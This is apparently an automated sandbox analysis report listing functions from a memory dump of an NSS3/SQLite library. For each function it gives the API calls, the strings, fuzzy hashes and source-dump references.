Instruction ID: d686aa2e388a792cf45a78da1581e87cc7066ad6345861d166bc2b7068bd0009
Opcode Fuzzy Hash: 3e718ccd6bab1a6fedfd2d9a6eb7fe1c954d190e0ed5511cbc5e350e8e81dcb0
Instruction Fuzzy Hash: A7513A75A51310AFE7108F14CC40B6A37A8EF4A71CFA4815AEC15AFFA1E731E815CB99

Function 6C6C0B00 Relevance: 13.6, APIs: 9, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6C0B21

Part of subcall function 6C6ABE30: SECOID_FindOID_Util.NSS3(6C66311B,00000000,?,6C66311B,?), ref: 6C6ABE44

Part of subcall function 6C698500: SECOID_GetAlgorithmTag_Util.NSS3(6C6995DC,00000000,00000000,00000000,?,6C6995DC,00000000,00000000,?,6C677F4A,00000000,?,00000000,00000000), ref: 6C698517

SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C0B64

Part of subcall function 6C6AFAB0: free.MOZGLUE(?,-00000001,?,?,6C64F673,00000000,00000000), ref: 6C6AFAC7

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C6C0B72
PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C6C0BA1
PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C6C0BB1
PK11_CreateContextBySymKey.NSS3(-00000001,00000105,?,?), ref: 6C6C0BF3
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C0C00

Part of subcall function 6C6995C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C677F4A,00000000,?,00000000,00000000), ref: 6C6995E0
Part of subcall function 6C6995C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C677F4A,00000000,?,00000000,00000000), ref: 6C6995F5
Part of subcall function 6C6995C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C699609
Part of subcall function 6C6995C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C69961D
Part of subcall function 6C6995C0: PK11_GetInternalSlot.NSS3 ref: 6C69970B
Part of subcall function 6C6995C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C699756
Part of subcall function 6C6995C0: PK11_GetIVLength.NSS3(?), ref: 6C699767
Part of subcall function 6C6995C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C69977E
Part of subcall function 6C6995C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C69978E

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C6C0C29

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$K11_Tag_$Item_$FindZfree$Algorithm$Length$Alloc_BlockContextCreateFreeInternalSizeSlotfree
String ID:
API String ID: 2322824727-0
Opcode ID: 50d3e374cf5fd7882b680568b19c81523a3a8e28ad8815e0f9b22da0b5d24a6c
Instruction ID: ccfcf8aa6bd0236114c420ece245451957c09739e83f9fd1515fa745378e56d6
Opcode Fuzzy Hash: 50d3e374cf5fd7882b680568b19c81523a3a8e28ad8815e0f9b22da0b5d24a6c
Instruction Fuzzy Hash: 2C31C3F5A00205ABE710DB24AD41BAB76B8DF1535CF000925E90A97B42F731E908C7FB

Function 6C5EE890 Relevance: 12.4, APIs: 5, Strings: 3, Instructions: 442stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 6C5EE922
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C5EE9CF
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C5EEA0F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5EEB20
memcpy.VCRUNTIME140(?,?,?), ref: 6C5EEB57

Strings

number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 6C5EEDC2
unknown column "%s" in foreign key definition, xrefs: 6C5EED18
foreign key on %s should reference only one column of table %T, xrefs: 6C5EEE04

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
API String ID: 638109778-272990098
Opcode ID: df40768a0b3deb23bc1bcab68cecf6220c5683baee030b37c15b6f79d27606b6
Instruction ID: 3f6c258f3c13053ec828d63c4b4a9befd86320c7536f917bcd168e8b2eded108
Opcode Fuzzy Hash: df40768a0b3deb23bc1bcab68cecf6220c5683baee030b37c15b6f79d27606b6
Instruction Fuzzy Hash: CB029F71E10119CFDB04CF99C880AAEB7F2FF8D314F2945A9D819AB751D771A841CBA0

Function 6C722F70 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 123stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C722FFD
sqlite3_initialize.NSS3 ref: 6C723007
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C723032
sqlite3_mprintf.NSS3(6C78AAF9,?), ref: 6C723073
sqlite3_free.NSS3(?), ref: 6C7230B3
sqlite3_mprintf.NSS3(sqlite3_get_table() called with two or more incompatible queries), ref: 6C7230C0

Strings

sqlite3_get_table() called with two or more incompatible queries, xrefs: 6C7230BB

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_mprintf$memcpysqlite3_freesqlite3_initializestrlen
String ID: sqlite3_get_table() called with two or more incompatible queries
API String ID: 750880481-4279182443
Opcode ID: 730c050f35a21fc24e4be7c132324710734b3228a13605a4e0973480b7ce6acc
Instruction ID: d40c16d559fc85d586ee09db67bec24a23d830ebd23b3cea79d6e5ea7edb4d8e
Opcode Fuzzy Hash: 730c050f35a21fc24e4be7c132324710734b3228a13605a4e0973480b7ce6acc
Instruction Fuzzy Hash: F941C271600606AFDB10CF25D944A86B7AAFF44368F148639EC2987B40E735F955CBE1

Function 6C668CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C67124D,00000001), ref: 6C668D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C67124D,00000001), ref: 6C668D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C67124D,00000001), ref: 6C668D73
PR_Unlock.NSS3(?,?,?,?,?,6C67124D,00000001), ref: 6C668D8C

Part of subcall function 6C6FDD70: TlsGetValue.KERNEL32 ref: 6C6FDD8C
Part of subcall function 6C6FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C6FDDB4

PR_Unlock.NSS3(?,?,?,?,?,6C67124D,00000001), ref: 6C668DBA

Strings

KRAM, xrefs: 6C668CF9
KRAM, xrefs: 6C668D3E

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: 8270b835501c95c7981c1040cd94e5e06ce5135ab7eecfe3e0030c1a06517830
Instruction ID: 71df5769bc523673114dcbaa0c868518cedc362bc96d46a476d1fcf7beda50f4
Opcode Fuzzy Hash: 8270b835501c95c7981c1040cd94e5e06ce5135ab7eecfe3e0030c1a06517830
Instruction Fuzzy Hash: ED2191B1A04601DFCB00EF7AC48459EB7F0FF4A308F15896AD89887B11D734E842CBA6

Function 6C760ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C760EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C760EFA

Part of subcall function 6C64AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C64AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C760F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C760F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C760F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C760F2B

Strings

Aborting, xrefs: 6C760EB3
Assertion failure: %s, at %s:%d, xrefs: 6C760ED9, 6C760EE5, 6C760F06, 6C760F0B

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: d59ad63bf2ffd7cb1fc21767a24e4fe708ad480565092c35a38d5f65aa5a29ae
Instruction ID: 3f3598f6e4d24fa77333da7899d060b1aa6a50fa715b661cd241871710cbd306
Opcode Fuzzy Hash: d59ad63bf2ffd7cb1fc21767a24e4fe708ad480565092c35a38d5f65aa5a29ae
Instruction Fuzzy Hash: 8101C0B5900214BBDF01AFA5ED49CAB3F3DEF46365B004074FD0997B01D632E91087A2

Function 6C668B50 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,6C670948,00000000), ref: 6C668B6B
EnterCriticalSection.KERNEL32(?,?,?,6C670948,00000000), ref: 6C668B80
PL_FinishArenaPool.NSS3(?,?,?,?,6C670948,00000000), ref: 6C668B8F
PR_Unlock.NSS3(?,?,?,?,6C670948,00000000), ref: 6C668BA1
DeleteCriticalSection.KERNEL32(?,?,?,?,6C670948,00000000), ref: 6C668BAC
free.MOZGLUE(?,?,?,?,?,6C670948,00000000), ref: 6C668BB8

Strings

Hgl, xrefs: 6C668B59

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalSection$ArenaDeleteEnterFinishPoolUnlockValuefree
String ID: Hgl
API String ID: 1456478736-512574546
Opcode ID: 26f4673aa98449d95296975753e4c13b6b712c90c44cb434c86324aad73cfc32
Instruction ID: 4d91f83c71d4b4c153f0c1722945f062cd3f2783a2f642745e9d6ffd576f63e1
Opcode Fuzzy Hash: 26f4673aa98449d95296975753e4c13b6b712c90c44cb434c86324aad73cfc32
Instruction Fuzzy Hash: 1C118FB16046059FDB00BFB9D08816DBBF4FF06345F01496AD88587A00EB35E495CB9B

Function 6C762B70 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41stringCOMMON

Download Yara Rule

APIs

strstr.VCRUNTIME140(?,.dll), ref: 6C762B81
PR_smprintf.NSS3(%s%s,?,.dll), ref: 6C762B98
PR_smprintf.NSS3(%s\%s%s,?,?,.dll), ref: 6C762BB4
PR_smprintf.NSS3(6C78AAF9,?), ref: 6C762BC4

Strings

%s\%s%s, xrefs: 6C762BAF
%s\%s, xrefs: 6C762B93
.dll, xrefs: 6C762B7B, 6C762BA8, 6C762BCE

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: R_smprintf$strstr
String ID: %s\%s$%s\%s%s$.dll
API String ID: 3360132973-3501675219
Opcode ID: 88a41365deece76d5e877b8d0447182638c190af72b8ba8d6be96d28d9272086
Instruction ID: 0dbe7d31146fb8c2bfa3e417670b92ecea9703a4c7ef4106a509b7c23e2ebec4
Opcode Fuzzy Hash: 88a41365deece76d5e877b8d0447182638c190af72b8ba8d6be96d28d9272086
Instruction Fuzzy Hash: 81F08226803135318991247B6F08DDB3E1DCDD37B9B541976BE1C62E41B712921480FA

Function 6C724D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C724DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C724DE0

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C724DCB
%s at line %d of [%.10s], xrefs: 6C724DDA
misuse, xrefs: 6C724DD5
invalid, xrefs: 6C724DB8
API call with %s database connection pointer, xrefs: 6C724DBD

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: c0e970f983fc86db9cd2d8ad2e2f4ae5b7feda6b56081b1e3a72982cd587565d
Instruction ID: 4ff96e5e84b843b56e6a55e21a4e6191d18ebe16a132f69606180104f3a23a99
Opcode Fuzzy Hash: c0e970f983fc86db9cd2d8ad2e2f4ae5b7feda6b56081b1e3a72982cd587565d
Instruction Fuzzy Hash: 5BF0BE22A156682BD7005155DF22F86379A4F02329F8609B1EF087BB92D20AAA908295

Function 6C724DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C724E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C724E4D

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C724E38
%s at line %d of [%.10s], xrefs: 6C724E47
misuse, xrefs: 6C724E42
invalid, xrefs: 6C724E25
API call with %s database connection pointer, xrefs: 6C724E2A

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: af1dbd6d4de815b7e20467e28cf0f7d58a2eca7bb01e1d91bf0569492b6c3fbb
Instruction ID: bd7388b8e6f0b4b41a11704e9038bc3d7054eb679024a7b8990befec1b8848b1
Opcode Fuzzy Hash: af1dbd6d4de815b7e20467e28cf0f7d58a2eca7bb01e1d91bf0569492b6c3fbb
Instruction Fuzzy Hash: C2F02711F459282BF71050699F11F87379E4B02329F8954F1EF0C7BE92D30D9EA052D5

Function 6C690C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C691444,?,00000001,?,00000000,00000000,?,?,6C691444,?,?,00000000,?,?), ref: 6C690CB3

Part of subcall function 6C6FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6FC2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C691444,?,00000001,?,00000000,00000000,?,?,6C691444,?), ref: 6C690DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C691444,?,00000001,?,00000000,00000000,?,?,6C691444,?), ref: 6C690DEC

Part of subcall function 6C6B0F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C652AF5,?,?,?,?,?,6C650A1B,00000000), ref: 6C6B0F1A
Part of subcall function 6C6B0F10: malloc.MOZGLUE(00000001), ref: 6C6B0F30
Part of subcall function 6C6B0F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C6B0F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C691444,?,00000001,?,00000000,00000000,?), ref: 6C690DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C691444,?,00000001,?,00000000), ref: 6C690E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C691444,?,00000001,?,00000000,00000000,?), ref: 6C690E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C691444,?,00000001,?,00000000,00000000,?,?,6C691444,?,?,00000000), ref: 6C690E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C691444,?,00000001,?,00000000,00000000,?), ref: 6C690E79

Part of subcall function 6C6A1560: TlsGetValue.KERNEL32(00000000,?,6C670844,?), ref: 6C6A157A
Part of subcall function 6C6A1560: EnterCriticalSection.KERNEL32(?,?,?,6C670844,?), ref: 6C6A158F
Part of subcall function 6C6A1560: PR_Unlock.NSS3(?,?,?,?,6C670844,?), ref: 6C6A15B2

Part of subcall function 6C66B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C671397,00000000,?,6C66CF93,5B5F5EC0,00000000,?,6C671397,?), ref: 6C66B1CB
Part of subcall function 6C66B1A0: free.MOZGLUE(5B5F5EC0,?,6C66CF93,5B5F5EC0,00000000,?,6C671397,?), ref: 6C66B1D2

Part of subcall function 6C6689E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C6688AE,-00000008), ref: 6C668A04
Part of subcall function 6C6689E0: EnterCriticalSection.KERNEL32(?), ref: 6C668A15
Part of subcall function 6C6689E0: memset.VCRUNTIME140(6C6688AE,00000000,00000132), ref: 6C668A27
Part of subcall function 6C6689E0: PR_Unlock.NSS3(?), ref: 6C668A35

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 7c01e8e9dcb8693a346e1152ae93aebef5e802ed09be18b9235cea3c0b86db7c
Instruction ID: 8919e93143be4044245895a9d88bdb2791ed12b196d266ebd16ed6fad71729ca
Opcode Fuzzy Hash: 7c01e8e9dcb8693a346e1152ae93aebef5e802ed09be18b9235cea3c0b86db7c
Instruction Fuzzy Hash: DC51D9F5D002019FEB109F64DC85AAB37A8EF4A318F150464ED1997B12FB31ED1987AE

Function 6C646E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C646ED8
sqlite3_value_text.NSS3(?,?), ref: 6C646EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C646FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C646FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C646FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C647010
sqlite3_value_blob.NSS3(?,?), ref: 6C64701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C647052

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: f9dfc056b62c07f78d7555f3e67fe5a187b7155ee1d2afe386c536923178abaf
Instruction ID: d556bf23be8ba49df7ef0af32603c3ee1d4f2bf46e4938304b9abc7337f5d69d
Opcode Fuzzy Hash: f9dfc056b62c07f78d7555f3e67fe5a187b7155ee1d2afe386c536923178abaf
Instruction Fuzzy Hash: 4B61E2B1E0520A8BDB40CF65C8007EEB7B2AF45308F28C165D855ABB51E732DC16CBA8

Function 6C69CA30 Relevance: 12.2, APIs: 8, Instructions: 174COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C69CA95
EnterCriticalSection.KERNEL32(00000000), ref: 6C69CAA9
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,00000000,?,6C69C8CF,?,?,?), ref: 6C69CAE7
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C69CB09
PK11_GetBlockSize.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?,6C69C8CF,?,?,?), ref: 6C69CB31

Part of subcall function 6C691490: PORT_Alloc_Util.NSS3(0000000C,?,?,?,?,6C69CB40,?,00000000), ref: 6C6914A1
Part of subcall function 6C691490: PORT_ZAlloc_Util.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,6C69C8CF,?), ref: 6C6914C7
Part of subcall function 6C691490: memset.VCRUNTIME140(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6914E4
Part of subcall function 6C691490: memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000), ref: 6C6914F5

PR_Unlock.NSS3(?), ref: 6C69CB97
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C69CBB2
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C69C8CF), ref: 6C69CBE2

